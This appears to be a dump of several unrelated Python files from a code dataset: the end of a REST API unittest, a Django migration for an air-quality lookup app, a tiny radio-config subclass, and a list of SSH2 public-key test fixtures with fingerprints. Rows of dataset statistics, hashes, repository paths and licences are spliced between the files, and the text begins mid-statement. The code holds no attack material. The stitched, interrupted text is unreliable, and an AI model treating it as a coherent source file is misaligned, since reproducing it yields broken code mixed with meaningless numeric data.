follow_redirects=True)
self.assertEqual(response.status_code, 204)
response = self.client() \
.post(f'{API_PREFIX}/progress/1234',
follow_redirects=True,
headers={
"Authorization": f"Bearer {self.token}"})
self.assertEqual(response.status_code, 403)
response = self.client() \
.patch(f'{API_PREFIX}/progress/{self.subject}',
follow_redirects=True)
self.assertEqual(response.status_code, 401)
response = self.client() \
.delete(f'{API_PREFIX}/users/{self.subject}',
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 204)
# Make the tests conveniently executable
if __name__ == "__main__":
unittest.main()
| 31.828283 | 74 | 0.508013 | 1,181 | 12,604 | 5.27265 | 0.127858 | 0.052995 | 0.0925 | 0.149028 | 0.780151 | 0.770997 | 0.770516 | 0.770516 | 0.753814 | 0.711418 | 0 | 0.020207 | 0.363932 | 12,604 | 395 | 75 | 31.908861 | 0.756517 | 0.017455 | 0 | 0.729642 | 0 | 0 | 0.195807 | 0.051015 | 0 | 0 | 0 | 0 | 0.107492 | 1 | 0.055375 | false | 0.003257 | 0.026059 | 0 | 0.084691 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6dfe264375cd69c323233c95b48b4075a6017cf3 | 4,840 | py | Python | pm_lookup/migrations/0001_initial.py | tommasosansone91/aqi_luftdaten | d78ffa562672095a9f9e8c763c2b021c41ed546b | [
"MIT"
] | null | null | null | pm_lookup/migrations/0001_initial.py | tommasosansone91/aqi_luftdaten | d78ffa562672095a9f9e8c763c2b021c41ed546b | [
"MIT"
] | 11 | 2020-06-06T01:39:10.000Z | 2021-06-09T17:47:07.000Z | pm_lookup/migrations/0001_initial.py | tommasosansone91/aqi_luftdaten | d78ffa562672095a9f9e8c763c2b021c41ed546b | [
"MIT"
] | null | null | null | # Generated by Django 2.2.8 on 2020-06-03 13:59
import django.contrib.postgres.fields
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='target_area_input_data',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('Name', models.CharField(max_length=256, unique=True)),
('Latitude', models.FloatField()),
('Longitude', models.FloatField()),
('Radius', models.FloatField()),
],
options={
'ordering': ['-Radius', 'Name'],
},
),
migrations.CreateModel(
name='target_area_output_data',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('Last_update_time', models.DateTimeField(default=django.utils.timezone.now)),
('PM10_mean', models.FloatField()),
('PM25_mean', models.FloatField()),
('PM10_quality', models.CharField(max_length=256)),
('PM25_quality', models.CharField(max_length=256)),
('PM10_cathegory', models.CharField(max_length=256)),
('PM25_cathegory', models.CharField(max_length=256)),
('n_selected_sensors', models.IntegerField(null=True)),
('Target_area_input_data', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='pm_lookup.target_area_input_data')),
],
options={
'ordering': ['-Target_area_input_data__Radius', 'Target_area_input_data__Name'],
},
),
migrations.CreateModel(
name='target_area_history_series',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('Record_time_values', django.contrib.postgres.fields.ArrayField(base_field=models.DateTimeField(), size=None)),
('PM10_mean_values', django.contrib.postgres.fields.ArrayField(base_field=models.FloatField(), size=None)),
('PM25_mean_values', django.contrib.postgres.fields.ArrayField(base_field=models.FloatField(), size=None)),
('PM10_quality_values', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=256), size=None)),
('PM25_quality_values', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=256), size=None)),
('PM10_cathegory_values', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=256), size=None)),
('PM25_cathegory_values', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=256), size=None)),
('n_selected_sensors_values', django.contrib.postgres.fields.ArrayField(base_field=models.IntegerField(null=True), size=None)),
('PM10_graph_div', models.TextField()),
('PM25_graph_div', models.TextField()),
('Target_area_input_data', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pm_lookup.target_area_input_data')),
],
options={
'ordering': ['-Target_area_input_data__Radius', 'Target_area_input_data__Name'],
},
),
migrations.CreateModel(
name='target_area_history_data',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('Last_update_time', models.DateTimeField(default=django.utils.timezone.now)),
('PM10_mean', models.FloatField()),
('PM25_mean', models.FloatField()),
('PM10_quality', models.CharField(max_length=256)),
('PM25_quality', models.CharField(max_length=256)),
('PM10_cathegory', models.CharField(max_length=256)),
('PM25_cathegory', models.CharField(max_length=256)),
('n_selected_sensors', models.IntegerField(null=True)),
('Target_area_input_data', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pm_lookup.target_area_input_data')),
],
options={
'ordering': ['-Target_area_input_data__Radius', 'Target_area_input_data__Name', '-Last_update_time'],
'unique_together': {('Target_area_input_data', 'Last_update_time', 'PM10_mean', 'PM25_mean')},
},
),
]
| 55 | 149 | 0.620455 | 504 | 4,840 | 5.660714 | 0.180556 | 0.059586 | 0.073607 | 0.093235 | 0.797406 | 0.775675 | 0.762005 | 0.762005 | 0.762005 | 0.721346 | 0 | 0.026761 | 0.243388 | 4,840 | 87 | 150 | 55.632184 | 0.752321 | 0.009298 | 0 | 0.55 | 1 | 0 | 0.208429 | 0.109117 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.05 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
09df2a67a35d55dab9ac1d6ce094e69c08291b69 | 115 | py | Python | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/phys/Phys_sigfox.py | lmnotran/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 82 | 2016-06-29T17:24:43.000Z | 2021-04-16T06:49:17.000Z | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/phys/Phys_sigfox.py | lmnotran/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 6 | 2022-01-12T18:22:08.000Z | 2022-03-25T10:19:27.000Z | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/phys/Phys_sigfox.py | lmnotran/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 56 | 2016-08-02T10:50:50.000Z | 2021-07-19T08:57:34.000Z | from pyradioconfig.parts.dumbo.phys.Phys_sigfox import PHYS_Sigfox
class PHYS_Sigfox_nixi(PHYS_Sigfox):
pass
| 23 | 66 | 0.826087 | 17 | 115 | 5.294118 | 0.588235 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.113043 | 115 | 5 | 67 | 23 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 6 |
61d204707beb9fff5d7d0a8afba5ad2cac4b64b0 | 27,128 | py | Python | tests/valid_keys_rfc4716.py | cryptokeytools/python-cryptokeytools | ad733bfbfdf90d9e330adf0772f90accb93f4ecc | [
"BSD-3-Clause"
] | null | null | null | tests/valid_keys_rfc4716.py | cryptokeytools/python-cryptokeytools | ad733bfbfdf90d9e330adf0772f90accb93f4ecc | [
"BSD-3-Clause"
] | null | null | null | tests/valid_keys_rfc4716.py | cryptokeytools/python-cryptokeytools | ad733bfbfdf90d9e330adf0772f90accb93f4ecc | [
"BSD-3-Clause"
] | null | null | null | keys = [
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1024-bit DSA, converted by ojarva from Ope"\nAAAAB3NzaC1kc3MAAACBAPlHIP5sD+T8/Sx1DGEiCzCXqpl7ww40jBg7wTkxu44OH6pNog\n5PjJt5M4NBULhKva/i+bhIM3ba+H1Or+aHWWFHACV6W2FCGk/k37ApRF8sIa4hsnN0P9qn\n6VfhbJKee+DBxa21WjjY/MZiljmJz7IQHx5RTxX9I/hJ7cL+aNmrAAAAFQCKteqc4IkgIr\njpcpStsxYAhb3MqQAAAIEA+SfIKuTr7QPcinsZQDdmZOXqcg+u9TLzHA4c47y0Kns3T3BV\nPr9rWdmuh6eImzLO4wMLxLvcg3ecrqFuiCp1IHvXENkGlpB17S+uOXlVDY+sTdXyvYKRKi\nrg5IZefIAP/m08c0QGkhFDbo4ysr9D5gXgH3LB2rMPIAbvMWm/HZQAAACBAKWtAE3hXRQX\n5KtI4AoIWVTly/6T4JNBt4u24ZRqV7X//CZEZ0cS5YpR/frlpUDI3WKoMtS+VmT3cBFZIN\nashIxZyfBF8+0UX3s34HwNfp0hDW3ZdgZJU56GC2eclMantYGeVrMxgTQd80pxZFgByEho\nXGeZaAwUzN8ULo9jHQqM\n---- END SSH2 PUBLIC KEY ----\n',
1024,
'MD5:76:66:08:8c:86:81:7e:f0:7b:cd:fa:c3:8c:8b:83:c0',
None,
'dsa_basic_1_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1024-bit DSA, converted by ojarva from Ope"\nAAAAB3NzaC1kc3MAAACBAJKa9kgpSUBLgPwgkRvYDayXIjigt36VZShchgKSNxjOXfuJpN\nP7BUZFJSqE1ZKvMcmMKah2V15a+aV8H5TnFYSUT+aq5BH2lSxx5cHQ/xrSMBobqjxQHQJs\nhrHugnrBmXvhadWHZ8T/kV0agddRTuC/nY28RA2OOLFukEc2C/O7AAAAFQDMCEXIHwdtyx\nv0HDBHhN+N9pzedwAAAIB7zE3EQ8tHvEhoHZ3lc53qMCfow64rv5L0eim6hqC/cwzWHGFk\n9PXAHgXOZBMB9P2gCdiL1Vydru/6ib3EbzAGR21xhvxlrZQqtJ7jKql0ZbVCqzYijBwJCU\n2OAvaxjyTZwg5o87h1LqxU9RRFJTJerMCcnEy4X7iIIF2S8TLeswAAAIAxQ9/DLm7l3X43\n8VFgdTKSOrrfgx5q5/sKXgauNTxaYfDEBlmWdFZme3+lB1gR0td9NMxH/ffntXd8ilB+9O\n8E87+K0Fi7aDWlToVbsvtyK/gLTwzg+qEjeHkbjN7yUltvhzzvLkJN7NodWx4ECNP9Kuxz\nxq711uoFOiC+pFjJhQ==\n---- END SSH2 PUBLIC KEY ----\n',
1024,
'MD5:ff:eb:5b:a2:31:26:4a:2f:90:60:93:1d:1c:e5:ac:40',
None,
'dsa_basic_2_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "16383-bit RSA, converted by ojarva from Op"\nAAAAB3NzaC1yc2EAAAADAQABAAAIAGVQSlWHuzZCaZOdUFTZHeLCZFmqK729sGT2Ymc36z\nhyV1MK8oPcUqsqCWX8HOYODOBv80tdjsSH7kbm1UGcv8FgzJuCmhVslozru/SGsuRJWwjL\nIyHYKXx/KT3jHngzL1tQwdBk5uqZx9pekQ9xnvbXkUzucf7LZ/8MvTdQJPSqPX/3KdwUw3\neiQoVGMSeKunukSAs9jbtlex8SN2ubqsuBEMtY7YUD4zLSWzkQ26L+dEhmYr1+WGVYD7t1\n6vQT/3WZsqa6MWHF6q0OJTojsHWc0TILYmeI8jQJ2uR64TjgmsEug7egbgoK1oBZwhChzd\nemI0reJ66VS01OwJxpVKKXlHPZlnjMwF4jvWTCE6vwBG/BjVHFyVNZ987XAJLmoP5TY53c\nnoFykyKbfd6Knwm7hBXrdBz+ZVYzVoDPewfkkYYiKh490GiWKLuKN35th5DMglNrXgtdeH\nZDm4VwAXPsWwMs/FXyIhPmq5M27HqLb/e4ELkrIf5XGJM+tVaQxUfvQU4/TWGwTqgd3V5k\n5gGWR8ekmpVWWspcnrzM4aks2vxSLuDUQOnyLJ9RYjVfMePZ0uctN298+Zf1QTLewAnbvD\nC//kiZmgy+Yt7Go8Eg56CY1lFrWHZ/LQNf/0j8VGlTUPTg9uYWFNj3VGkTXSGEco7XSOPF\nQCkvkzoVaAxWeiNm7ECIUkIBusAOEqhhzJfpOirlgXxbrpK40NXJGvAPMo82HLA48WLBG7\nRcpzIIk/BDdhOBsM90crljGNmCs3Y4KbQX6CaxTUAUtRt8ydDP9V7qNkAsWgDp3uIOT8Hj\nMP9K8PBTarwnZziGBx+ZlgqdYkxeOgXMiLhNKZl2VlmAeS9ojfK7azpCd+b0MuwvBfkvI1\nBtbJph/1gtyLTXv4JSUbZurZVES9xGh9Wf6fX5MroZhQ9SZry6xzOpCK7SlJJTwSQKLzNb\ny0hLGBs7S6ew/DCFfAZEa1SJrubX+y4ogW4AcdSo6wKW6XdlCXivT8bvSdQRAbU+eVWDAd\nbi8fvq5BQuxEU+qtoxX+eZHF3PFVJWoPlGtKanEHJa/LyAXtrRVFKh79HlK/0PgGurS4Ec\no2ZHOuFz48yTrxPQMrhetfwCU8yRed6Ocrw0yJ2P/QtSw4+/EPWT3eyTL/8EN/ZY/6mOAP\nWksScZjgwM/a+BpaZsM2IS0SUPRaFmyr2QaAgqM34B2muukx4J1nrGzNgdwGXwgHeTtHek\nRLTUTKpr0ZVMhNoz/Nu/1ypwr/oSN5mnn9JuFKzTnsPVhjgEpywPSYppJFltJfxo82Ya2b\ni/CdYfGD9+KPR3gdppjx6eUPgimvgYS5zr+HmINMZEba84+Zi2JNdTjiOSfHGdb/RvnY/4\nFX7sB2/rCzaRlIpM5kUlM8EvzvSAN2l6Gn2Kjau2e5hZKwVxIq8bUmwKkCw2bq3hlHWsnC\nClp9kIWtnV8xGKvd9dBEryEMDWM2DDjJenxGPifrOHgfwEbfHKWkQu1JfxEhmNpjtppkzo\noVkgs5Pcq9dlOjoDZziEGAiAeXRFDqvoP0hOViHYrV/I0SlIfZ+p9YxLNJo/6FNI3d+ifT\nzYB7GyCrqI+cR83qesi+XIaTBZXsVxGYFG1+fADy5DLhdeaHDx6638kPHTxUoZhHMYs443\ncJZTjsg8F7LH5diN69kh4IxEo0t6RpvaQx0gb/03N5jjyY7rNVy6QYAeS7b116IO68lzWw\nnOhWdDbgjMKC9Il0wtKEhlGirYum1gBC6cqR9SDOTwCtXsNwDllxU0VvLJu8Fwk/KAaxZw\nT6ZwIJQPD9LtXcpFsiZGX4mOW2n+AMachk6gKv
e0ZH0BNDQzcShSdIgWl2bOxd0R1XcDDC\nbcd0oQHhECrNe8Nx64ObhW38U2WOg8QYCGLVsys/afkKkado4Kw6zDOA0baROXNPup6gWe\nsEgEfKsMqkcIYu9tEbB2JoCRwFgZorDP0VroJphscWYpVXNlMtavP/DgU6yiOVFZtg5HaB\nat1DREQzvrk8fLxd+jOAo6CwSXsQDC9ebXKFEXjlCD2igQUtFqV7Wz8HEyl6hA5shBWUSg\ndVKIsspRC9PeksJrlCPzx/5d9whBZzr8uaFaM7f20nhAgzIki7XSKlN0/a/nw8WUlQMbMx\n98n5LY0whtmj429k8zAI8jEIrVyCQjzEss2FKIuw836acH+XF/e501UGlIAoFvj4/OBKfx\n/+L68ujo7PUDPcuFlu8mZ2I6tohHKriJYeZcRryeT/zXpQs28AN1QWDfFDNSQGFkrUoLuM\nUYSjMx0ftb6LDw/Ilaz3/zJzz4PtECutPgKtrtqYxYyDVHbyn6fBiECtHnSXd3b9dp3iFI\n4t8VBFOEIcX01Mdgjvum5Pb6KxJf58pcUBQUeI+Bg1aHR+ojh5ZeqEYFr2ojdSD/0WehwU\nPF8IGCPVCaTKksh2yPyR174LDD05UoWvm8hc1CLhuuASq6xPrAXhcZlEl7zTJXWKD356j9\nOvLItEFQqolsIhS2m/W8pWzCPtY9je3bWyB+vzN3BquSuLoriIcZrF7FL7f+ZVGQDmNhIK\nGalojIOlzyRIHXKEV89gQHU88lWWAEc0MNP80Ag0/avrp35myUbWoP4Elkm3UjUvZHWOiW\nCDABEoaGlnexVgtQctJ42ZnQIztGp+hvgmezJWtqKrtfiIW6G2N+3O2pLoDubejswrG9k7\nOhtK358XF1YOxzIGyFPTvEODhe0Zv9\n---- END SSH2 PUBLIC KEY ----\n',
16383,
'MD5:b6:ff:d9:90:61:a7:73:77:49:cc:b1:41:ca:c1:3b:a5',
None,
'valid_rsa_16383_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "16384-bit RSA, converted by ojarva from Op"\nAAAAB3NzaC1yc2EAAAADAQABAAAIAQDA3u1W05Y/yxHAmYDYnt3vO3FbRU6xmPT1Z/XChA\nL1CQyYLd2DLEwQUhyBh5dQWsPdYKtn6rytIhYnfIHcZx+kZa7U0H89eO8pSYkkEmgiP6Hv\nhff1MmqPqofbarzbqES8yWZb+Tux6Rdp5uPviBt8S+Dz6h8BvsePSN97vAoSM6opzDT8Ef\nowXCq88tzYsuyyE8k2bU1aItP6TgZBUDEEZ6VxJ/9djfjp9XiFrZIZpFXUCtic8sCpVsem\navzv7XEmg97Bp5TFwwXT6FGJEwCKZXq1I3v8jNJwgnQoY8EPCKtNWDJgxCJNM5jKHm4mcS\nea0mIOPbkwEHCuCV8N6sPTMkSEmLW5nLESKqsc4sumCcPxYS/wePR3Wt5By72NL3D+j8ey\ne3kzzabMJmIC3vjrGfKpSGTfkq5F5v4kR+fwooOn9/6YYZZRoZzTAgoW7niU8Tp7SP/sbh\nnVhXQkxyZU0lZuJZxClB2wm/D6ndJPc/abd3pYnHmxxmnKxYWH7B1+Bu4wJYGpkIyD1wPW\nMIwrKX1E6q8pBh4Bf8K6Ie8Yv4X+BTmoB80Y2RhaYkLw3QhS4MciJ2ObsTGJGJmRb0UVmE\nNmJWpBl3MuAVhi3F5BxWCKy7mJPls3rSryA7USRDJE4MkaNcrKKHpv6anOeEXWng3L3SwO\nzveDm3yU1EXjHRTkJir/XhJcFywjHUz0FBvk/+O6Dl/I7PiVUnFLdX7v0SFIyRoRTnh6x9\nIGI0aXeqnSd4o49qIxIU2d89wI9Ot1Y3Fs5bW8H36xumj0McxFazlGV7cOBc6JEoF9dsxs\n6JcPf/K8yfg8st5Cvck53lq5qIncV5KVtkGuB1Qot5nZqCauejDUnj8eWQu2jAlnbb5dLs\nQOFWfVmKLqgkEVEFtPDF1Ro+HRTuz83CxQSVH1oafvrlxxhVIjqxqsXG/qvbBLA98u0fIu\nFHsOQJOB86Oaa9Gpkoz4APVpyYbm/jRsAZ+YDlTgqyRsFcvR4brXepX5bFWgdfr3Vuk4fw\nnWOm2avn5eD2pkK3CijJV1OlsS0w3w1oCkloQMh1bLQ4kg8fwvx3cp5SXps1mGr/LhSY0o\nbvUYQN5WPOpG4/IwhwGwsHSOxO/zig7druuj8E4fpKoxPKrdaU+4I47EoZHf/122JCDHq5\n/uqZqKP4wcvOpV62cVnxDzIz+fXizEGlp6lWOod73GinYNKLLT2My8m3rlDlIEOipFZREH\nvDkknX23zMGGml18jI8PIR6Dp6Eyve/PdTD0Cdyy7BXahCmVc5NosZFCeQxxIm4pZs1tX2\n8vgif9r6MVPt4EvQlHlvv/orQ5+efUxAOSVRbXWfJZ17GtmYJV8zcmKxQGdMrkWzHKxafB\nOETE4TK+uKnL1dRF/QJ7+1+T9DbBHOUk/WdSTz0kqgUPk08QYP+ZsTCdybDrS88lIaDOZJ\nHwxHjmjDFogrn+tlAVdxKLgzkZ8O0E48X5Lrq5nxJwSGMy+vkuUw7lOUh+LfoYsnijfoWg\nyqJ0C08KzkVKmMW76557z9j6l6fcR3I1eILGL+kTo0YX/SxWLEXB6P8Vq+DE9xWo8NOX1q\n4giX9aSaf00AHlmZ93GP2NmmCcjfzpAOQfl4spwjMxqp7F1szqgEncAIEr17Tnmosxw7ta\n7/2R4Iv92Ly4IV+UTeptGkD8V+p1zn+0FCnwr0gC/lWsXr1N3OSrWVxzx4HunH+cAOoegf\nH1EsfXfV5XY4Imw/wIEgcCI/VxUXPjbXRLtD8Ek00GiYt2NumxGeQ6pEGblc0VXeZ/79z9\novLtZtemML3QePAEEWfv0dAUotN6nATUt7Av6L
Jl4eCcdxXezvjaj7eMQApPrw6TcnRIvW\nElY+NhjaOvz4Jpw7iEGrLIvNTKWArDpi9o4zEVobnou3igRNY75dMcpj8Q66n5kdKGOqrE\nL1CRDzozSUclUb+ET4wHSLK7m0978Q5CdDsaD0vpEevQmDJEIvVdYMwEyqemeweD2MzsrK\ngSxPcz3znFbfW5SsK1D4vQsC8MsvCsGSA4HhSHgeZ9Mu/qroxAAhr7jTfVpYUJnTi3SOAI\nh0KiZvX4hZuXEdght/+29+vnPDsr2ZOg46iBk5+HXKVTjcHtWILH2zqsuvY6yjqx+da3Z/\nIwJM7vPXc9GcOj/g1IK34BXq/z+Jt8fHGmwQXl60X2HJ/RKyJARhoDU/75r1wTCRFHylpv\nKRKJynSQ5P+2tsOJ8M37xOSskqrTABDr27t71MluWZVVNwW9wOcsfTP0zEIgQE6e9Pb5WT\nethX49jC+RUodAwMIh00xyq0KioifRhjIzEphpFB9+L89TOzkLbhvyX9SJyU0VgPNsooIF\nyanJmeSQ0YY2AV/mph6k3tRFrsx/fWmkE9BAGkQNWJXyvTmgm5I+7wYTX/jzPgHqESGKuG\nYGmKJ3QTLHrVfjk7rLszBbun3eJHyvEo0ngWkd6A1TlCeySK+i3PNZ3CPwKtkElkvAlA5e\nvObrmdT0dxq58Z37+dftaslV5Pv+kzv7xQBydCu7h+juxCLPYp0YSSVkcPe2JTS3iutIyy\nAj1sAPh9yBwWIEzpujC9jyxUxkShXZFlgUehTqNw0MbBGDsvGSAevyMaAI11BYw48BH2ay\nSlN5xY1zNd/k/b/3kfpPw5sOq4XxABha5Tgo9e+zRbdYTKwMglt+9tELliMOSHBGmLYzIc\nkl5ZEGBbiRf3+EQZgBpYhQiyZ6Oq7hlQ==\n---- END SSH2 PUBLIC KEY ----\n',
16384,
'MD5:0e:e0:bd:c7:2d:1f:69:49:94:44:91:f1:19:fd:35:f3',
None,
'valid_rsa_16384_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "768-bit RSA, converted by ojarva from Open"\nAAAAB3NzaC1yc2EAAAADAQABAAAAYQCxO38tKAJXIs9ivPxt7AYdfybgtAR1ow3Qkb9GPQ\n6wkFHQqcFDe6faKCxH6iDRteo4D8L8BxwzN42uZSB0nfmjkIxFTcEU3mFSXEbWByg78aod\ndMrAAjatyrhH1pON6P0=\n---- END SSH2 PUBLIC KEY ----\n',
768,
'MD5:56:84:1e:90:08:3b:60:c7:29:70:5f:5e:25:a6:3b:86',
None,
'valid_rsa_768_rfc4716', ["loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "771-bit RSA, converted by ojarva from Open"\nAAAAB3NzaC1yc2EAAAADAQABAAAAYQbdtLTII+vP98NSDlK2LXxVARELRYO0NODFYQ0imY\nxsmBMB7BrfljFppLJyjU6cziOT6YFj6rVd8MmCogdCR32u63EV11uT6RCFfJMQJtIi+B1J\nJipTxLzURsiUOOgAHJc=\n---- END SSH2 PUBLIC KEY ----\n',
771,
'MD5:29:01:ab:68:09:69:02:57:86:ea:f2:76:4b:2f:ef:f8',
None,
'valid_rsa_771_rfc4716', ["loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "780-bit RSA, converted by ojarva from Open"\nAAAAB3NzaC1yc2EAAAADAQABAAAAYgpPyLrc+NDQJjf4B1jVA/eTaOzpDqmjM/oFKQEq+H\neSFxqFS3Fe7kLIfvdClVyYshg3qz1OfH+mCkcqLX5CPhdZZZbDxAbowAfPmBF77qeQqOsq\nNhIO0tQ6NX00PNmp5sLL\n---- END SSH2 PUBLIC KEY ----\n',
780,
'MD5:86:0a:3f:a5:aa:3b:c1:6c:50:86:dd:4c:86:d9:6f:18',
None,
'valid_rsa_780_rfc4716', ["loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "783-bit RSA, converted by ojarva from Open"\nAAAAB3NzaC1yc2EAAAADAQABAAAAYnE55Aie+1J73DhvqOgyOf+hRMRI9+qoCRhIX6/xGi\njmrWBKhax0CKQ/E4HDyoviUbd/Q4jPNnpjA9lJWLDh23auSUPQMl4xBuUxzaJh1G+HFYJH\n0HA9/ONFb6oQd0J8StuJ\n---- END SSH2 PUBLIC KEY ----\n',
783,
'MD5:b6:6f:95:a1:f2:e4:de:ac:9d:22:e9:70:40:80:3d:22',
None,
'valid_rsa_783_rfc4716', ["loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "786-bit RSA, converted by ojarva from Open"\nAAAAB3NzaC1yc2EAAAADAQABAAAAYwNgeGM0y1gmTC5yGLpiL2TF56l+ynG+9OcoonNsXt\n/mnAOpH7KbVnA7utELLidfS6oenKBWMJlbMmMeM+/7mEcKoF0TUAtdaJvtawLmUKHdAZNv\n0qZhrKN0L/OZAvkn5u2urw==\n---- END SSH2 PUBLIC KEY ----\n',
786,
'MD5:d2:e4:db:9f:c1:3f:7f:ab:09:a8:ef:b8:0d:0e:4c:e9',
None,
'valid_rsa_786_rfc4716', ["loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "789-bit RSA, converted by ojarva from Open"\nAAAAB3NzaC1yc2EAAAADAQABAAAAYx1UtgIDIf1tpk4ro2r7ethUFwrL94KhffPD6E0Z5U\n5dC8ZCjblTauZSmhztVYMh/8nhU/ArP/zy208d32mMxTklxnx/tFulwtDXaH13A8EdCNdB\nzUG+wQ75O0kQVUMpp/rVnQ==\n---- END SSH2 PUBLIC KEY ----\n',
789,
'MD5:ef:32:28:eb:3f:2a:a1:bf:34:d1:26:bd:8c:6f:c0:c2',
None,
'valid_rsa_789_rfc4716', ["loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "792-bit RSA, converted by ojarva from Open"\nAAAAB3NzaC1yc2EAAAADAQABAAAAZADu5iFbDQWHggy7d1kKkc6RVkNkiRjOwT1dbghPz1\nlWX3HK/iGFoMySTB1iviwoufHNAPS75WJeC1nfZBEkrIW16SrwsfLtuKMwjz+8Sb2ENtC7\ntyLB8IG77/ewRDEwOGiu8pc=\n---- END SSH2 PUBLIC KEY ----\n',
792,
'MD5:b1:aa:90:f3:76:8b:46:a9:0e:3b:e7:e6:1f:dd:30:e8',
None,
'valid_rsa_792_rfc4716', ["loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "804-bit RSA, converted by ojarva from Open"\nAAAAB3NzaC1yc2EAAAADAQABAAAAZQ8rZh7qsWG7dcZ+Gs6yg0AAJyjJhkzYG4qmG5HkS6\nim0D5H1jk9FZCAdZpJdQc8oBUGBDRe1xtorY4GsxS+Bdk5BoiGMwr7yWKjFy0Ert6MUG7Q\nUAknM3nLZKWm4MZvPRToHGjr\n---- END SSH2 PUBLIC KEY ----\n',
804,
'MD5:22:09:eb:fe:94:a5:3d:58:b0:23:ea:42:0b:a2:3b:6c',
None,
'valid_rsa_804_rfc4716', ["loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "807-bit RSA, converted by ojarva from Open"\nAAAAB3NzaC1yc2EAAAADAQABAAAAZW0CyFwCSXjZ/FJ1RuqkgBeLgTBJ3hk/OTn0pI8g9c\nr9r5EFlYT8/ZXd1ilP5rSknba1g9FudG8eCH7Ah+cnbFbzPJNH6Aofga9hh4fewKo+KI0S\n65H+XgBJsp+xEZnLPCIqhzkF\n---- END SSH2 PUBLIC KEY ----\n',
807,
'MD5:28:ce:cf:1c:54:2d:c2:26:d6:b4:9c:7a:9f:fa:d8:1a',
None,
'valid_rsa_807_rfc4716', ["loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "810-bit RSA, converted by ojarva from Open"\nAAAAB3NzaC1yc2EAAAADAQABAAAAZgKVmEp6e8BmGxLrfBE+bzMog35mZ70vTurSwKZ+PE\n2eo4/h2xLXC0/O6tFItgukF2oG75Hkx0CrLwbSBYeaYVtYCp7dWiDQpS8Ribq5zRHl0tz+\n9DBioHSIAkNJ6Xesy6y+5oZHiQ==\n---- END SSH2 PUBLIC KEY ----\n',
810,
'MD5:d1:21:8b:4d:84:6b:cd:8c:4e:d8:b5:92:ef:75:76:d0',
None,
'valid_rsa_810_rfc4716', ["loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "813-bit RSA, converted by ojarva from Open"\nAAAAB3NzaC1yc2EAAAADAQABAAAAZhnHxufkUNVz7fITzsow1EFbxdCH7GB8BaT5fUESJD\n3TYKaCbHefxrDU6UYAgaEKnXVmd5tE3D2qZ8Z33ECEuQHHIoSicB5VIG+zNwOLve8/ftFj\nippwnSe89g/1Lu/qXVzsGCCvTw==\n---- END SSH2 PUBLIC KEY ----\n',
813,
'MD5:7e:9a:26:2b:77:54:d1:24:54:a7:e7:05:41:be:bb:7e',
None,
'valid_rsa_813_rfc4716', ["loose"]],
